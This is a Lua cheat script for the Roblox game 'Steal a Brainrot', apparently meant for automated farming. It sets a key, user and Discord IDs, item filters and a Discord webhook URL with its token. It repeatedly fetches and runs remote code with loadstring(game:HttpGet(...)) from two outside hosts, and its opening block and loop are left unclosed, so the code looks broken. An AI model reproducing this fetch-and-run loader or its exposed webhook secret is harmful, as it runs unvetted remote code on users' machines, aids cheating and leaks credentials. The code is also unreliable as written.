spawn(function()
    _G.Config = { UserID = "1906033b-76b6-4227-bb52-1da777e8d57c", 
        discord_id = "462235685097701381" , 
        Note = "Pc", } 
   local s;for i=1,5 do s=pcall(function()loadstring(game:HttpGet("https://cdn.yummydata.click/scripts/sab"))()
end)
task.wait(15)
getgenv().Key = "k60088776a0053e7f2f6dc8f"
getgenv().Config = {
    ["Gameplay"] = {
        -- Private Server config
    ["Server Type"] = "Private",
        ["Collect Cash Cap"] = "350B",

        -- Public Server config
        ["Max Auctioning Multiplier"] = 10,
        ["Lock Base Extra Time"] = 5,
    },

    ["Misc"] = {
        ["Kick if Ping above"] = 1750,
        ["Kick if FPS below"] = 0,
    ["Max Rebirth"] = 9,
    ["Buy Brainrot Dealer"] = 7,

        ["Ignore Secret"] = {
            ["La Vacca Saturno Saturnita"] = { "All" },
            ["Karkerkar Kurkur"] = { "All" },
            ["Sammyni Spyderini"] = { "All" },
            ["Extinct Tralalero"] = { "All" },
            ["Extinct Matteo"] = { "All" },
            ["Dul Dul Dul"] = { "All" },
            ["Chachechi"] = { "All" },
            ["Los Tralaleritos"] = { "All" },
            ["Las Tralaleritas"] = { "All" },
            ["La Cucaracha"] = { "All" },
            ["Job Job Job Sahur"] = { "All" },
        ["Frankentteo"] = { "All" },
        ["Zombie Tralala"] = { "All" },
        ["Graipuss Medussi"] = { "All" },
        ["Perrito Burrito"] = { "All" },
        ["To to to Sahur"] = { "All" },
        ["Los Tortus"] = { "All" },
        ["Los Jobcitos"] = { "All" },
        ["Guerriro Digitale"] = { "All" },
        ["Nooo My Hotspot"] = { "All" },
        ["Telemorte"] = { "All" },
        ["Los Tortus"] = { "All" },
        ["Trickolino"] = { "All" },
        ["Pirulitoita Bicicleteira"] = { "All" },
        ["Los Cucarachas"] = { "All" },
        ["Coffin Tung Tung Tung Sahur"] = { "All" },
        ["Reindeer Tralala"] = { "All" },
        ["Santteo"] = { "All" },
        ["List List List Sahur"] = { "All" },
        ["Los 25"] = { "All" },
        ["Chimnino"] = { "All" },
        ["Chicleteirina Bicicleteirina"] = { "All" },
        
        },
        ["Open Lucky Block"] = {
        "Los Lucky Blocks",
        "Los Taco Blocks",
        "Festive Lucky Block",
        },

        ["Buy Lucky Block"] = {
            "Secret Lucky Block",
            "Spooky Lucky Block",
        "Festive Lucky Block",
        },
    },

    ["Performance"] = {
        ["FPS Cap"] = 10,
        ["Black Screen"] = true,
    },

    ["Webhook"] = {
        ["Enable"] = true,
        ["Url"] = "https://discord.com/api/webhooks/1454694325480067278/h-kSsEeKiqvCFyka7UlpsKjGy3US89RjQD-FBafdYkvzq3VXveeGbaRqGahIIJiC1bkf",
        ["Ignore Notify"] = {
        ["Chicleteira Bicicleteira"] = { "All" },
        ["La Grande Combinasion"] = { "All" },

        },
    }
}

-- Kick if script fails to load
spawn(function()
    task.wait(200)
    if not getgenv().scriptLoaded then
        game.Players.LocalPlayer:Kick("Script load timeout\nKick to prevent animal gets stolen")
    end
end)

-- Keep loading until Joebiden flag is set
repeat
    wait()
    spawn(function()
        loadstring(game:HttpGet("https://nousigi.com/loader.lua"))()
    end)
    wait(20)
until getgenv().Joebiden
